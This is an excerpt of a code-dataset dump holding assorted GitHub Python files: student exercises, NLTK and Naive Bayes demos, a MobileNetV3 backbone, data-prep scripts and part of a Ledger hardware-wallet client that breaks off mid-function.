table\n \n # parameters necessary for fitting and writing output\n redshift = table['z'][binNum]\n # lumDist = table['lumDist'][binNum]\n outfile = '{}/{}_ID_{}_BIN_{}_npTT1'.format(outGal, cluster, ID, binNum)\n \n # create argument list to pass to params.py\n args = ['python', 'params.py', #'mpiexec', '-np', '10', this goes before 'python'\n '--object_redshift', str(redshift),\n # '--luminosity_distance', str(lumDist),\n '--fixed_metallicity', str(0.02),\n '--infile', str(file),\n '--filterFile', str(filterFile),\n '--binNum', str(int(binNum)),\n '--verbose', str(int(1)), # True\n '--emcee',\n # '--dynesty',\n # '--nested_dlogz_init=500', # see prospect/utils/prospect_args.py\n # '--nested_posterior_thresh=50', # for more information\n '--outfile', outfile]\n try :\n subprocess.run(args) # run the subprocess\n except :\n pass\n\nend = 
time.time()\n\nprint(end - begin)\n","repo_name":"camlawlorforsyth/HFF","sub_path":"boneyard/prospector.py","file_name":"prospector.py","file_ext":"py","file_size_in_byte":2463,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"73109392439","text":"from math import pi, floor\r\nprint('________________VOLUME DO CUBO E DA ESFERA___________________')\r\n\r\n#Valores\r\nr = float(input('Digite o raio da esfera: '))\r\na = float(input('Digite o valor da aresta: '))\r\n\r\n#Volume Esfera\r\nraio_esfera_cubo = r ** 3\r\n\r\nvolume_esfera = floor(4/3 * pi * raio_esfera_cubo)\r\nvolume_cubo = a ** 3\r\n\r\n#Volume Livre\r\nvolume_livre = volume_esfera + volume_cubo\r\n\r\nprint('O Volume livre desse ambiente é de: {:.2f}'.format(volume_livre))","repo_name":"JoaoVitorJJV/UFRA-Exercicios-BPM-LB","sub_path":"Aritmética Simples/volume_cubo_esfera.py","file_name":"volume_cubo_esfera.py","file_ext":"py","file_size_in_byte":464,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"31361828535","text":"import nltk\r\nfrom nltk.tokenize import word_tokenize\r\ntext = \"\"\"Parsing is the method to identify and understand the syntactic structure of a text.\r\nIt is done by analyzing the individual elements of the text. \"\"\"\r\ntext_tokenized = word_tokenize(text)\r\nprint(list(nltk.bigrams(text_tokenized)))\r\n# Output: [('Parsing', 'is'), ('is\", 'the'), ('the', 'method'), ('method', 'to')......]\r\n\r\nprint(list(nltk.trigrams(text_tokenized)))\r\n# Output: [('Parsing', 'is', 'the'), ('is', 'the', 'method'), ('the', 'method', 'to')......]\r\n\r\n# For extracting n-grams, we can use the function nltk.ngrams and give the argument n for the number of parsers.\r\nprint(list(nltk.ngrams(text_tokenized,5)))\r\n","repo_name":"Viola8/Python-NLP-Libraries","sub_path":"nltk_bigrams_n_grams.py","file_name":"nltk_bigrams_n_grams.py","file_ext":"py","file_size_in_byte":685,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"21186594191","text":"# -*- coding: utf-8 -*-\n\n\"\"\"\nDescription:\n Creation of the speech data by splitting the recordings\n into train, validation and test sets.\n Filtering out recordings that are too long.\n\nUsage:\n $ python src/data/create_speech_data.py -s\n\nPossible arguments:\n * -s or --save: Save dataframe to csv\n\"\"\"\nimport os\nimport shutil\n\nimport click\nimport librosa\nimport pandas as pd\nfrom sklearn.model_selection import train_test_split\n\nfrom src.decorators import log_function_name\nfrom src.stt.constants import (\n MAX_DURATION_LENGTH,\n RAW_DATA_DIR,\n RAW_RECORDINGS_DIR,\n RECORDINGS_FILE,\n)\n\n\ndef get_wav_file_duration(file_path: str) -> float:\n \"\"\"\n Get the duration of a wav file\n\n Parameters\n ----------\n file_path : str\n Path to the wav file\n\n Returns\n -------\n float\n Duration of the wav file in seconds\n \"\"\"\n return librosa.get_duration(filename=os.path.join(RAW_RECORDINGS_DIR, file_path))\n\n\n@log_function_name\ndef copy_files(files_list: list[str], folder: str) -> None:\n \"\"\"\n Copy files from the raw data folder to the new folder\n\n Parameters\n ----------\n files_list : list[str]\n List of files to copy\n folder : str\n Name of the folder to copy the files to\n \"\"\"\n new_dir = os.path.join(RAW_DATA_DIR, folder)\n if os.path.exists(new_dir) and os.path.isdir(new_dir):\n shutil.rmtree(new_dir)\n os.makedirs(new_dir, exist_ok=True)\n\n for file in 
files_list:\n shutil.copyfile(\n os.path.join(RAW_RECORDINGS_DIR, file),\n os.path.join(new_dir, file),\n )\n\n\n@log_function_name\ndef clean_df(df: pd.DataFrame, folder: str) -> pd.DataFrame:\n \"\"\"\n Clean the dataframe by adjusting, adding and removing the required columns.\n Adding the files to the new respective folder.\n\n Parameters\n ----------\n df : pd.DataFrame\n Dataframe to clean\n folder : str\n Name of the folder to copy the files to\n\n Returns\n -------\n pd.DataFrame\n Cleaned dataframe\n \"\"\"\n\n df[\"path\"] = df[\"file_name\"].apply(lambda x: os.path.join(RAW_DATA_DIR, folder, x))\n df[\"audio\"] = df[\"path\"]\n df = df.rename(columns={\"phrase\": \"sentence\"})\n\n copy_files(df[\"file_name\"].tolist(), folder)\n\n df = df.loc[:, [\"audio\", \"sentence\", \"path\"]]\n\n return df\n\n\n@log_function_name\ndef create_own_dataset(\n file_path: str,\n) -> tuple[pd.DataFrame, pd.DataFrame, pd.DataFrame]:\n \"\"\"\n Adjusting the dataset to the required format\n\n Parameters\n ----------\n file_path : str,\n Path to the csv file\n\n Returns\n -------\n tuple(pd.DataFrame, pd.DataFrame, pd.DataFrame)\n Tuple of train, validation and test dataframes\n \"\"\"\n\n df = pd.read_csv(file_path)\n\n df[\"duration\"] = df[\"file_name\"].apply(get_wav_file_duration)\n df = df[df[\"duration\"] < MAX_DURATION_LENGTH].copy()\n\n df_train, df_test = train_test_split(df, test_size=0.25, random_state=42)\n df_train, df_val = train_test_split(df_train, test_size=0.3, random_state=42)\n\n df_train = clean_df(df_train, \"train\")\n df_val = clean_df(df_val, \"val\")\n df_test = clean_df(df_test, \"test\")\n\n return df_train, df_val, df_test\n\n\n@click.command()\n@click.option(\n \"--save\",\n \"-s\",\n help=\"Save dataframe\",\n default=False,\n is_flag=True,\n required=False,\n)\n@log_function_name\ndef main(save: bool) -> None:\n \"\"\"\n Main function\n\n Parameters\n ----------\n save : bool\n Flag if data should be saved\n \"\"\"\n if not save:\n print(\"No data will be saved\")\n\n df_train, df_val, df_test = create_own_dataset(RECORDINGS_FILE)\n\n if save:\n df_train.to_csv(os.path.join(RAW_DATA_DIR, \"train.csv\"), index=False)\n df_val.to_csv(os.path.join(RAW_DATA_DIR, \"val.csv\"), index=False)\n df_test.to_csv(os.path.join(RAW_DATA_DIR, \"test.csv\"), index=False)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"Tara-Sophia/NLP_Masterthesis","sub_path":"src/stt/create_data.py","file_name":"create_data.py","file_ext":"py","file_size_in_byte":3921,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"40"} +{"seq_id":"19286504617","text":"import numpy as np\r\nimport math\r\nfrom scipy.stats import norm\r\nfrom sklearn.base import BaseEstimator\r\n\r\n#NOTES:\r\n#Zrobic dict'y i zliczac wystapienia\r\n#Liczniki normaliziuja\r\n\r\n\r\n\r\nclass NaiveBayesNominal:\r\n\r\n\r\n def __init__(self):\r\n self.classProbabilities = dict() # { Y : P(Y) }\r\n self.featureConditionalProbabilities = dict() # { (Xindex, X, Y) : P(X|Y) }\r\n self.classes = []\r\n # self.classes_ = None\r\n # self.model = dict()\r\n # self.y_prior = []\r\n\r\n\r\n # X = 'dreszcze', 'katar', 'bol_glowy', 'goraczka'\r\n # y = 'grypa'\r\n\r\n def fit(self, X, y):\r\n self.classes = np.unique(y)\r\n numOfClasses = np.size(y)\r\n classQuantities = dict()\r\n for class_ in np.nditer(self.classes):\r\n classQuantities[class_.item(0)] = np.count_nonzero(y == class_) #wykorzystac w linijce ponizej\r\n self.classProbabilities[class_.item(0)] = np.count_nonzero(y == 
\r\n\r\n        for xIndex in range(0, len(X[0,:])):\r\n            classesWithFeature = dict() # { (X,Y) : occurrences }\r\n            for yIndex in range(0, numOfClasses):\r\n                classWithFeature = ( X[yIndex, xIndex], y[yIndex] )\r\n                if classWithFeature not in classesWithFeature:\r\n                    classesWithFeature[classWithFeature] = 1\r\n                else:\r\n                    classesWithFeature[classWithFeature] += 1\r\n\r\n            for tup in classesWithFeature:\r\n                self.featureConditionalProbabilities[(xIndex,) + tup] = classesWithFeature[tup] / float(classQuantities[tup[1]])\r\n\r\n    def predict_proba(self, X):\r\n        result = []\r\n        for x in X:\r\n            classScore = dict()\r\n            for y in self.classes:\r\n                classScore[y] = self.classProbabilities[y]\r\n                for index, xi in np.ndenumerate(x):\r\n                    classScore[y] *= self.featureConditionalProbabilities[(index[0], xi, y)]\r\n            denominator = sum(classScore.values())\r\n            result.append(max(classScore.values())/denominator)\r\n        return np.array(result)\r\n\r\n\r\n    def predict(self, X):\r\n        result = []\r\n        for x in X:\r\n            classScore = dict()\r\n            for y in self.classes:\r\n                classScore[y] = self.classProbabilities[y]\r\n                for index, xi in np.ndenumerate(x):\r\n                    classScore[y] *= self.featureConditionalProbabilities[(index[0], xi, y)]\r\n            result.append(max(classScore, key=classScore.get))\r\n        return np.array(result)\r\n\r\nclass NaiveBayesGaussian:\r\n    def __init__(self):\r\n        self.classes = []\r\n        self.classProbabilities = dict() # { Y : P(Y) }\r\n        self.featureProbs = dict() # { (Xindex, X, Y) : G(X) }\r\n        self.featureAvgs = dict() # { (Xindex, Y) : val }\r\n        self.featureDeviations = dict()\r\n\r\n    def fit(self, X, y):\r\n        self.classes = np.unique(y)\r\n        numOfClasses = np.size(y)\r\n        classQuantities = dict()\r\n        for class_ in np.nditer(self.classes):\r\n            classQuantities[class_.item(0)] = np.count_nonzero(y == class_) # reused in the line below\r\n            self.classProbabilities[class_.item(0)] = np.count_nonzero(y == class_) / float(numOfClasses)\r\n\r\n        featuresWithClass = dict() # { (Xindex, Y) : occurrences }\r\n\r\n        for yIndex, y in np.ndenumerate(y):\r\n            for xIndex in range(0, len(X[0,:])):\r\n                if (xIndex, y) in featuresWithClass:\r\n                    featuresWithClass[(xIndex, y)] = np.append(featuresWithClass[(xIndex, y)], X[yIndex, xIndex])\r\n                else:\r\n                    featuresWithClass[(xIndex, y)] = np.array(X[yIndex, xIndex])\r\n\r\n        for key, value in featuresWithClass.items():\r\n            self.featureAvgs[key] = np.mean(value)\r\n            self.featureDeviations[key] = np.std(value)\r\n\r\n\r\n    def predict_proba(self, X):\r\n        result = []\r\n        for x in X:\r\n            classScore = dict()\r\n            for y in np.unique(self.classes):\r\n                classScore[y] = self.classProbabilities[y]\r\n                for index, xi in np.ndenumerate(x):\r\n                    # print(self.featureDeviations[(index[0], y)])\r\n                    classScore[y] *= 1 / (self.featureDeviations[(index[0], y)] * math.sqrt(2 * math.pi)) * math.exp(\r\n                        ((-1) * math.pow(xi - self.featureAvgs[(index[0], y)], 2)) / (\r\n                            2 * pow(self.featureDeviations[(index[0], y)], 2)))\r\n            denominator = sum(classScore.values())\r\n            res = np.array([])\r\n            for score in classScore.values():\r\n                res = np.append(res, [score/denominator])\r\n            result.append(res)\r\n\r\n        return np.array(result)\r\n\r\n    def predict(self, X):\r\n        result = []\r\n        for x in X:\r\n            classScore = dict()\r\n            for y in np.unique(self.classes):\r\n                classScore[y] = self.classProbabilities[y]\r\n                for index, xi in np.ndenumerate(x):\r\n                    # print(self.featureDeviations[(index[0], y)])\r\n                    classScore[y] *= 1/(self.featureDeviations[(index[0], y)]*math.sqrt(2*math.pi))*math.exp(((-1)*math.pow(xi - self.featureAvgs[(index[0], y)],2))/(2*pow(self.featureDeviations[(index[0], y)],2)))
\r\n            result.append(max(classScore, key=classScore.get))\r\n        return np.array(result)\r\n\r\n\r\nclass NaiveBayesNumNom(BaseEstimator):\r\n    def __init__(self, is_cat=None, m=0.0):\r\n        raise NotImplementedError\r\n\r\n    def fit(self, X, yy):\r\n        raise NotImplementedError\r\n\r\n    def predict_proba(self, X):\r\n        raise NotImplementedError\r\n\r\n    def predict(self, X):\r\n        raise NotImplementedError","repo_name":"KrzysztofR-PUT/sklearn-1","sub_path":"classifiers_students/naive_bayes.py","file_name":"naive_bayes.py","file_ext":"py","file_size_in_byte":5724,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"10334316494","text":"# functions\n\npreco = 19.90\n\nimposto = preco * 0.05\nprint(imposto)\n\npreco2 = 100\nimposto2 = preco2 * 0.05\nprint(imposto2)\n\n# create a calcularImposto() function that computes a 7% tax and returns it to the caller\ndef calcularImposto(preco):\n    imposto = preco * 0.07\n    return imposto\n\npreco = 299\nimposto = calcularImposto(preco)\nprint(imposto)\n\nvalores = [1.99, 24.50, 78.27, 1515.50]\n# if I want to compute the tax for these four values\nfor valor in valores:\n    print(\"The tax on {} is {}\".format(valor, calcularImposto(valor)))\n\n# declare a calcularImpostoAliquota function that takes two parameters, the product price and the tax rate to apply, and returns the computed tax. If no rate is given, use 7% as the default\ndef calcularImpostoAliquota(valor, aliquota = 7):\n    imposto = valor * (aliquota /100)\n    return imposto\n\nprint(\"\\n\")\nfor valor in valores:\n    print(\"The tax on {} is {}\".format(valor, calcularImpostoAliquota(valor, 12)))","repo_name":"SouzaMth/AnimaCursoExtensaoPython2022-2","sub_path":"aula3-2022-11-09b.py","file_name":"aula3-2022-11-09b.py","file_ext":"py","file_size_in_byte":962,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"33041061032","text":"import math\nimport torch\nimport torch.nn as nn\nfrom torch.hub import load_state_dict_from_url\n\n__all__ = ['MobileNetV3_Large']\n\nmodel_urls = {\n    # no pretrained weights available yet\n    'MobileNetV3_Large': None,\n}\ndef _make_divisible(v, divisor, min_value=None):\n    \"\"\"\n    This function is taken from the original tf repo.\n    It ensures that all layers have a channel number that is divisible by 8\n    It can be seen here:\n    https://github.com/tensorflow/models/blob/master/research/slim/nets/mobilenet/mobilenet.py\n    :param v:\n    :param divisor:\n    :param min_value:\n    :return:\n    \"\"\"\n    if min_value is None:\n        min_value = divisor\n    new_v = max(min_value, int(v + divisor / 2) // divisor * divisor)\n    # Make sure that round down does not go down by more than 10%.\n    if new_v < 0.9 * v:\n        new_v += divisor\n    return new_v
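\n\n# Worked check (added): _make_divisible rounds to the nearest multiple of the\n# divisor but never rounds down by more than 10%. For example,\n# _make_divisible(30, 8) returns 32, while _make_divisible(27, 8) first rounds\n# to 24 and, since 24 < 0.9 * 27, is bumped back up to 32.\n\nclass SELayer(nn.Module):\n    def __init__(self, channel, reduction=4):\n        super(SELayer, self).__init__()\n        self.avg_pool = nn.AdaptiveAvgPool2d(1)\n        self.fc = nn.Sequential(\n                nn.Linear(channel, _make_divisible(channel // reduction, 8)),\n                nn.ReLU(inplace=True),\n                nn.Linear(_make_divisible(channel // reduction, 8), channel),\n                h_sigmoid()\n        )\n\n    def forward(self, x):\n        b, c, _, _ = x.size()\n        y = self.avg_pool(x).view(b, c)\n        y = self.fc(y).view(b, c, 1, 1)\n        return x * y\n \nclass h_sigmoid(nn.Module):\n    def __init__(self, inplace=True):\n        super(h_sigmoid, self).__init__()\n        self.relu = nn.ReLU6(inplace=inplace)\n\n    def forward(self, x):\n        return self.relu(x + 3) / 6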
\n\n\nclass h_swish(nn.Module):\n    def __init__(self, inplace=True):\n        super(h_swish, self).__init__()\n        self.sigmoid = h_sigmoid(inplace=inplace)\n\n    def forward(self, x):\n        return x * self.sigmoid(x) \n\ndef conv_3x3_bn(inp, oup, stride):\n    return nn.Sequential(\n        nn.Conv2d(inp, oup, 3, stride, 1, bias=False),\n        nn.BatchNorm2d(oup),\n        h_swish()\n    )\n\n\ndef conv_1x1_bn(inp, oup):\n    return nn.Sequential(\n        nn.Conv2d(inp, oup, 1, 1, 0, bias=False),\n        nn.BatchNorm2d(oup),\n        h_swish()\n    ) \n\nclass InvertedResidual(nn.Module):\n    def __init__(self, inp, hidden_dim, oup, kernel_size, stride, use_se, use_hs):\n        super(InvertedResidual, self).__init__()\n\n        assert stride in [1, 2]\n\n        if inp == hidden_dim:\n            self.branch = nn.Sequential(\n                # dw conv\n                nn.Conv2d(hidden_dim, hidden_dim, kernel_size, stride, (kernel_size - 1) // 2, groups=hidden_dim, bias=False),\n                nn.BatchNorm2d(hidden_dim),\n                h_swish() if use_hs else nn.ReLU(inplace=True),\n                # Squeeze-and-Excite\n                SELayer(hidden_dim) if use_se else nn.Identity(),\n                # pw-linear\n                nn.Conv2d(hidden_dim, oup, 1, 1, 0, bias=False),\n                nn.BatchNorm2d(oup),\n            )\n\n        else:\n            self.branch = nn.Sequential(\n                # pw\n                nn.Conv2d(inp, hidden_dim, 1, 1, 0, bias=False),\n                nn.BatchNorm2d(hidden_dim),\n                h_swish() if use_hs else nn.ReLU(inplace=True),\n                # dw\n                nn.Conv2d(hidden_dim, hidden_dim, kernel_size, stride, (kernel_size - 1) // 2, groups=hidden_dim, bias=False),\n                nn.BatchNorm2d(hidden_dim),\n                # Squeeze-and-Excite\n                SELayer(hidden_dim) if use_se else nn.Identity(),\n                h_swish() if use_hs else nn.ReLU(inplace=True),\n                # pw-linear\n                nn.Conv2d(hidden_dim, oup, 1, 1, 0, bias=False),\n                nn.BatchNorm2d(oup),\n            )\n\n        self.downsample = nn.Sequential(\n            nn.Conv2d(inp, oup, kernel_size = 1, stride = stride , bias=False),\n            nn.BatchNorm2d(oup),\n        )\n\n        self.identity = stride == 1 \n\n\n    def forward(self, x):\n        if self.identity:\n            downsampx = self.downsample(x)\n            return downsampx + self.branch(x)\n        else:\n            return self.branch(x)\n\n\nclass MobileNetV3(nn.Module):\n    def __init__(self, stages_out_channels, num_classes=1000, width_mult=1.):\n        super(MobileNetV3, self).__init__()\n\n        if len(stages_out_channels) != 16:\n            raise ValueError('expected stages_out_channels as list of 16 positive ints')\n        self._stage_out_channels = stages_out_channels\n\n        self.klist = [3,3,3,5,5,5,3,3,3, 3,3,3,5,5,5]\n        self.tlist = [1,4,3,3,3,3,6,2.5, 2.3,2.3,6,6,6,6,6]\n        self.slist = [1,2,1,2,1,1,2, 1, 1, 1, 1,1,2,1,1]\n        self.selist = [0,0,0,1,1,1,0,0, 0, 0, 1,1,1,1,1]\n        self.hslist = [0,0,0,0,0, 0,1,1,1, 1, 1,1,1,1,1]\n        \n\n        input_channels = 3\n        output_channels = self._stage_out_channels[0] # 16\n        #output_channels = _make_divisible(output_channels * width_mult, 4 if width_mult == 0.1 else 8)\n\n        self.conv1 = conv_3x3_bn(input_channels, output_channels, 2)\n        input_channels = output_channels\n\n        \n        stage_names = ['stage{}'.format(i) for i in range(2,17)]\n        for name, output_channels,k, t, s ,use_se,use_hs in zip(\n                stage_names, self._stage_out_channels[1:], self.klist, self.tlist, self.slist, self.selist, self.hslist):\n            seq = []\n            output_channels = _make_divisible(output_channels * width_mult, 8)\n            exp_size = _make_divisible(input_channels * t, 8)\n            seq.append(InvertedResidual(input_channels, exp_size, output_channels, k, s, use_se, use_hs))\n            setattr(self, name, nn.Sequential(*seq))\n            input_channels = output_channels\n        \n\n\n\n    def forward(self, x):\n        x = self.conv1(x)\n        c2 = self.stage2(x)\n        c3 = self.stage3(c2)\n        c4 = self.stage4(c3)\n        c5 = self.stage5(c4)\n        c6 = self.stage6(c5) \n        c7 = self.stage7(c6)
\n        c8 = self.stage8(c7)\n        c10 = self.stage9(c8)\n\n        c11 = self.stage10(c10)\n        c12 = self.stage11(c11)\n        c13 = self.stage12(c12)\n        c14 = self.stage13(c13)\n        c15 = self.stage14(c14) \n        c16 = self.stage15(c15)\n        c17 = self.stage16(c16)\n\n        return c3, c5, c16, c17\n \n\n \ndef _mobilenetv3(arch, pretrained, progress, *args, **kwargs):\n    model = MobileNetV3(*args, **kwargs)\n\n    if pretrained:\n        model_url = model_urls[arch]\n        if model_url is None:\n            raise NotImplementedError('pretrained {} is not supported as of now'.format(arch))\n        else:\n            state_dict = load_state_dict_from_url(model_url, progress=progress)\n            model.load_state_dict(state_dict,strict=False)\n\n    return model\n\n\ndef MobileNetV3_Large(pretrained=False, progress=True, **kwargs):\n    \"\"\"\n    Constructs a MobileNetV3-Large backbone, the \"Large\" variant described in\n    \"Searching for MobileNetV3\".\n\n    Args:\n        pretrained (bool): If True, returns a model pre-trained on ImageNet\n        progress (bool): If True, displays a progress bar of the download to stderr\n    \"\"\"\n    return _mobilenetv3('MobileNetV3_Large', pretrained, progress,\n                        [16,16,24,24,40,40,40,80, 80, 80, 80, 112,112,160,160,160], **kwargs)
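\n\n\nif __name__ == '__main__':\n    # Smoke test (added; the 224x224 input size is an assumption): the backbone\n    # returns four feature maps (c3, c5, c16, c17) for downstream detector heads.\n    net = MobileNetV3_Large()\n    feats = net(torch.randn(1, 3, 224, 224))\n    print([f.shape for f in feats])\n","repo_name":"eddie0509tw/Dbnet","sub_path":"models/modules/mobilenetv3.py","file_name":"mobilenetv3.py","file_ext":"py","file_size_in_byte":7428,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"40"} +{"seq_id":"1930769873","text":"import os\nimport argparse\nimport numpy as np\nfrom skimage.transform import resize\nfrom skimage.io import imread, imsave\n\n\ndef get_args():\n    parser = argparse.ArgumentParser()\n\n    parser.add_argument('--input_folder', type=str, required=True)\n    parser.add_argument('--output_folder', type=str, required=True)\n    parser.add_argument('--output_height', type=int, required=True)\n    parser.add_argument('--output_width', type=int, required=True)\n\n    return parser.parse_args()\n\n\ndef resize_image(image, height, width):\n    resized_image = resize(image, (height, width), anti_aliasing=True)\n    resized_image = np.round(resized_image * 255.0).astype(np.uint8)\n    return resized_image\n\n\nif __name__ == '__main__':\n    args = get_args()\n    files_list = os.listdir(args.input_folder)\n    for filename in files_list:\n        print(filename)\n        image = imread(os.path.join(args.input_folder, filename))\n        resized_image = resize_image(image, args.output_height, args.output_width)\n        imsave(os.path.join(args.output_folder, filename), resized_image)","repo_name":"vsbaldeev/dogs-vs-cats","sub_path":"data_resizer.py","file_name":"data_resizer.py","file_ext":"py","file_size_in_byte":1063,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"45497186885","text":"\"\"\"\nAn example of how to use encore.\n\nSteps:\n0) Add a path to encore to your python path.\n\n1) Define the DM particle mass and the spatial edges of the snapshot.\n\n2) Create an Encore object with a path to the output, the particle mass,\nand (optional) specify whether you want jackknifing.\n\n3) Reduce the halo catalog to halos you want, downsample dark matter\nparticles, jackknife the dark matter particles.\n\n4) Compute things you want, such as the mass function or\ncorrelation functions. To accomplish the latter you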
\nneed to create random catalogs.\n\"\"\"\n\n#Step 0\nimport sys\nsys.path.insert(0,\"../Encore/\")\nimport encore\n\n#Step 1\nparticle_mass = 3.98769e10 #Msun/h\nedges = [0.0,1050.0] #Mpc/h; spatial edges of the snapshot\n\n#Step 2\nDSdmpath = \"./output/\"\nrandompath = DSdmpath\nreducedhalopath = \"../encore_scratch/\"\nmy_encore = encore.encore(outpath=\"./output/\",randompath=randompath,\n                          DSdmpath=DSdmpath,reducedhalopath=reducedhalopath,\n                          particle_mass=particle_mass,do_JK=True)\n\n#Step 3\nmy_encore.reduce_halo_catalogs() #Already done\n#my_encore.down_sample_dm() #Already done\n#my_encore.jackknife_dm()\n\n#Step 4\n#my_encore.compute_mass_function(do_JK=True)\n#my_encore.create_random_catalogs(edges,N=800000) #Comment this out once it is run one time\nmy_encore.compute_hhcf(edges,do_JK=True)\n#You can also define your own radial bins\n#Note: more bins and smaller scales means a longer run time\nlimits = [0.1,50.0]\nnbins = 20\n#my_encore.compute_hmcf(edges,nbins=nbins,limits=limits,do_JK=False)\n","repo_name":"tmcclintock/Encore","sub_path":"example.py","file_name":"example.py","file_ext":"py","file_size_in_byte":1539,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"35532525590","text":"gear = []\nfor i in range(4):\n    x = list(map(int, input()))\n    gear.append(x)\nk = int(input())\ncmds = []\nfor i in range(k):\n    n, direction = map(int, input().split())\n    cmds.append([n, direction])\n\n\ndef rotate(gear, chk):\n    if chk:\n        return [gear[-1]] + gear[0:-1]  # Clockwise Turn\n    else:\n        return gear[1:] + [gear[0]]  # Counter Clockwise Turn\n\n\nfor cmd in cmds:\n    dir = [0] * 4\n    num = cmd[0] - 1\n    if cmd[1] == 1:\n        dir[num] = 1\n    else:\n        dir[num] = -1\n\n    for i in reversed(range(num)):\n        if gear[i][2] != gear[i + 1][6]:\n            dir[i] = (-1) * dir[i + 1]\n        else:\n            break\n\n    for i in range(num + 1, 4):\n        if gear[i - 1][2] != gear[i][6]:\n            dir[i] = (-1) * dir[i - 1]\n        else:\n            break\n\n    for i in range(4):\n        if dir[i] == 0:\n            continue\n        elif dir[i] == 1:\n            gear[i] = rotate(gear[i], True)\n        elif dir[i] == -1:\n            gear[i] = rotate(gear[i], False)\n\n\nscore = gear[0][0] * 1 + gear[1][0] * 2 + gear[2][0] * 4 + gear[3][0] * 8\nprint(score)","repo_name":"wk1219/Algorithm-Prob","sub_path":"Baekjoon/Step_prob/Implementation_prob/baekjoon-14891.py","file_name":"baekjoon-14891.py","file_ext":"py","file_size_in_byte":1103,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"28729066355","text":"from riemann import tx\nfrom riemann import utils as rutils\n\nfrom ledger import blue, utils\n\nfrom typing import cast, List, Optional, Tuple\nfrom ledger.ledger_types import LedgerXPub, PrevoutInfo\n\n# https://ledgerhq.github.io/btchip-doc/bitcoin-technical-beta.html\n\n\nSIGHASH_ALL = tx.shared.SIGHASH_ALL\n\n\ndef _parse_public_key_response(response: bytes) -> LedgerXPub:\n    '''\n    Parse the Ledger's serialized key response into a data structure\n    '''\n    pubkey_len = response[0]\n    pubkey = response[1:1 + pubkey_len]\n    address = response[1 + pubkey_len + 1:-32]\n    chain_code = response[-32:]  # last 32 are chain_code\n    return LedgerXPub(\n        pubkey=bytes(pubkey),\n        address=address.decode('utf8'),\n        chain_code=bytes(chain_code))\n\n\nasync def get_key_info(client: blue.Ledger, derivation: str) -> LedgerXPub:\n    '''\n    This corresponds to the GET WALLET PUBLIC KEY command\n    It asks the ledger for the key at a derivation path\n    Args:\n        derivation (str): the derivation path string\n    
Returns:\n (LedgerXPub): The parsed public key with type, address and chain_code\n '''\n # first we get the path into a form that the ledger can understand\n deriv_indices = utils.parse_derivation(derivation)\n\n # make the apdu formatted request body\n derivation_data = blue.derivation_path_to_apdu_data(deriv_indices)\n pubkey_req_apdu = blue.make_apdu(\n command=b'\\x40',\n data=derivation_data,\n p2=b'\\x02') # native segwit address\n\n # It comes in a blob with chaincode and address\n pubkey_response = await client.exchange(pubkey_req_apdu)\n\n # return the parsed response\n pubkey = _parse_public_key_response(pubkey_response)\n return pubkey\n\n\nasync def get_uncompressed_public_key(\n client: blue.Ledger, derivation: str) -> bytes:\n '''Get the public key for a derivation'''\n pubkey = await get_key_info(client, derivation)\n return pubkey['pubkey']\n\n\nasync def get_xpub(\n client: blue.Ledger,\n derivation: str,\n mainnet: bool = True) -> str:\n '''\n Gets the xpub at a derivation path\n '''\n if derivation == 'm':\n parent = None\n else:\n # this looks like magic, but just pops the last derivation off\n parent_derivation = '/'.join(derivation.split('/')[:-1])\n parent = await get_key_info(client, parent_derivation)\n\n child = await get_key_info(client, derivation)\n\n # make the xpub for the child and instantiate an object\n xpub = utils.make_child_xpub(derivation, parent, child, mainnet)\n return xpub\n\n\ndef _transaction_start_packet(chunk: bytes) -> bytes:\n '''make UNTRUSTED HASH TRANSACTION INPUT START beginning apdu'''\n return blue.make_apdu(\n command=b'\\x44',\n p1=b'\\x00',\n p2=b'\\x02',\n data=chunk)\n\n\ndef _transaction_continue_packet(chunk: bytes) -> bytes:\n '''make UNTRUSTED HASH TRANSACTION INPUT START continuation apdu'''\n return blue.make_apdu(\n command=b'\\x44',\n p1=b'\\x80',\n p2=b'\\x02',\n data=chunk)\n\n\ndef _output_continue_packet(chunk: bytes) -> bytes:\n '''UNTRUSTED HASH TRANSACTION INPUT FINALIZE FULL non-final packet'''\n return blue.make_apdu(\n command=b'\\x4a',\n data=chunk)\n\n\ndef _output_final_packet(chunk: bytes) -> bytes:\n '''UNTRUSTED HASH TRANSACTION INPUT FINALIZE FULL last packet'''\n return blue.make_apdu(\n command=b'\\x4a',\n p1=b'\\x80',\n data=chunk)\n\n\ndef _packetize_version_and_vin_length(t: tx.Tx) -> bytes:\n '''The first packet sent to UNTRUSTED HASH TRANSACTION INPUT START'''\n # will break on bullshit like non-compact VarInts\n chunk = t.version + tx.VarInt(len(t.tx_ins)).to_bytes()\n return _transaction_start_packet(chunk)\n\n\ndef _packetize_input(tx_in: tx.TxIn, prevout_info: PrevoutInfo) -> List[bytes]:\n '''Turn an input into a set of packets for tx prep'''\n if tx_in.script_sig != b'':\n raise NotImplementedError('Only native SegWit')\n le_value = rutils.i2le_padded(prevout_info['value'], 8)\n\n chunks = []\n\n # 02 for segwit, then the outpoint,\n # then the I64 value, then 0 for len(script)\n chunks.append(b'\\x02' + tx_in.outpoint.to_bytes() + le_value + b'\\x00')\n chunks.append(tx_in.sequence)\n\n return [_transaction_continue_packet(chunk) for chunk in chunks]\n\n\ndef _packetize_input_for_signing(\n tx_in: tx.TxIn,\n prevout_info: PrevoutInfo) -> List[bytes]:\n '''Turn an input into a set of packets for the last step of signing'''\n chunks = []\n if prevout_info['witness_script'] is None:\n raise ValueError('Packet for signing must have a script')\n script = cast(bytes, prevout_info['witness_script'])\n le_value = rutils.i2le_padded(prevout_info['value'], 8)\n\n script_len_bytes = 
